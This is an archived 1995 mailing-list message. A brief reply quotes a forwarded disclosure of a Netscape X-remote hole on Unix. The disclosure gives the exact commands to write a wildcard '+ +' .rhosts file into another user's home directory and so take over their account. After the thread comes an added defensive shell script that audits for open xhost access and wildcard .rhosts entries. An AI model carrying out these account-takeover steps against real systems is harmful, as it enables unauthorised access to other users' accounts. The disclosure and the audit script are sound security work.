1995-09-29 - Re: Netscape hole without .Xauthority (fwd)

Header Data

From: sameer <sameer@c2.org>
To: jk@digit.ee (Jyri Kaljundi)
Message Hash: 18b28ecf21807bd8fcf4f2cc7858cf5c8fce0980b9d90b7a6506ae2d30fafcfc
Message ID: <199509291644.JAA07516@infinity.c2.org>
Reply To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
UTC Datetime: 1995-09-29 16:55:35 UTC
Raw Date: Fri, 29 Sep 95 09:55:35 PDT

Raw message

From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 09:55:35 PDT
To: jk@digit.ee (Jyri Kaljundi)
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <199509291644.JAA07516@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	That's called an X hole, not a netscape hole.

> 
> 
> Haven't seen this on the cypherpunks yet, sorry if this has been here
> already.
> 
> Juri
> 
> <o       Jüri Kaljundi          e-mail: jk@digit.ee         o<
>  >o                             tel: +372 6308994            o>
> <o       DigiTurg               http://www.digit.ee/        o<
> 
> ---------- Forwarded message ----------
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.
> 
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps :
> 
> - make a text file containing only "+ +" accessible (as file, as URL, or
>   whatever you like) to the target Netscape client. This is quite easy, either
>   if you have a personal WWW page (http://... URL) or an account on the
>   target machine (file://... URL), or even by uploading it to an anon FTP
> 
> - set your DISPLAY environment variable to the target display
> 
> - run the following set of commands :
> 
>   netscape -noraise -remote "openURL(<put-your-URL-here>)"
>   netscape -noraise -remote "saveAs(.rhosts)"
>   netscape -noraise -remote back
> 
> In the second command, the path should be specified whenever possible
> (~ is not accepted).
> 
> If the target user does not already have a .rhosts and is not looking at that
> precise moment, then the chances are it worked !
> 
> Solution to the problem : every user concerned should either create a
> Xauthority file, or stop using Netscape.
> 
> 	MXK
> 
> 
> PS: WHY do they bother with PGP and RSA security when they keep such holes ????
> 
> +------------------------------------+---------------------------------+
> |  Denis AUROUX  (MXK)               | Ecole Normale Superieure        |
> |  255 rue Saint-Jacques             | 45 rue d'Ulm                    |
> |  75005 PARIS FRANCE                | 75005 PARIS                     |
> |  email: auroux@clipper.ens.fr      | FRANCE                          |
> +------------------------------------+---------------------------------+
> | This .sig is SHAREWARE. If you use it often, please send me $50.     |
> | After registering you will receive a fully functional .sig and all   |
> | updates for free.                                                    |
> +----------------------------------------------------------------------+
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org
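An audit helper, added here as an example and not part of the thread or of either author's code, that checks the two conditions the forwarded message relies on: an X server running with access control disabled (as reported by xhost) and a wildcard "+ +" entry in ~/.rhosts. The parsing functions take text as input so they can be exercised offline; the xhost output wording is assumed from common X11 releases.

```shell
#!/bin/sh
# Checks for the preconditions described in the forwarded message:
#  1. X access control disabled (xhost reports "access control disabled")
#  2. a wildcard "+ +" (any host, any user) line in ~/.rhosts
# Text-based helpers are separated from the live audit so they can be tested.

# Returns 0 if the given xhost(1) output shows access control disabled.
xhost_open() {
    printf '%s\n' "$1" | grep -qi 'access control disabled'
}

# Returns 0 if the given .rhosts content contains a wildcard entry:
# a line that is "+ +" (or a bare "+", which also trusts every host),
# ignoring comment lines and surrounding whitespace.
rhosts_wildcard() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' \
        | grep -Eq '^[[:space:]]*\+([[:space:]]+\+)?[[:space:]]*$'
}

# Live audit of the current account; prints each finding and returns 1 if any.
audit_account() {
    rc=0
    if [ -z "$XAUTHORITY" ] && [ ! -f "$HOME/.Xauthority" ]; then
        echo "no .Xauthority file: start X via xdm/startx or create one with xauth"
        rc=1
    fi
    if [ -n "$DISPLAY" ] && command -v xhost >/dev/null 2>&1; then
        if xhost_open "$(xhost 2>/dev/null)"; then
            echo "X access control disabled on $DISPLAY: re-enable with 'xhost -'"
            rc=1
        fi
    fi
    if [ -f "$HOME/.rhosts" ] && rhosts_wildcard "$(cat "$HOME/.rhosts")"; then
        echo "wildcard '+' entry in ~/.rhosts: remove it"
        rc=1
    fi
    return $rc
}
```

Run `audit_account` from an interactive session on the machine being checked; a non-zero return means at least one of the conditions above was found.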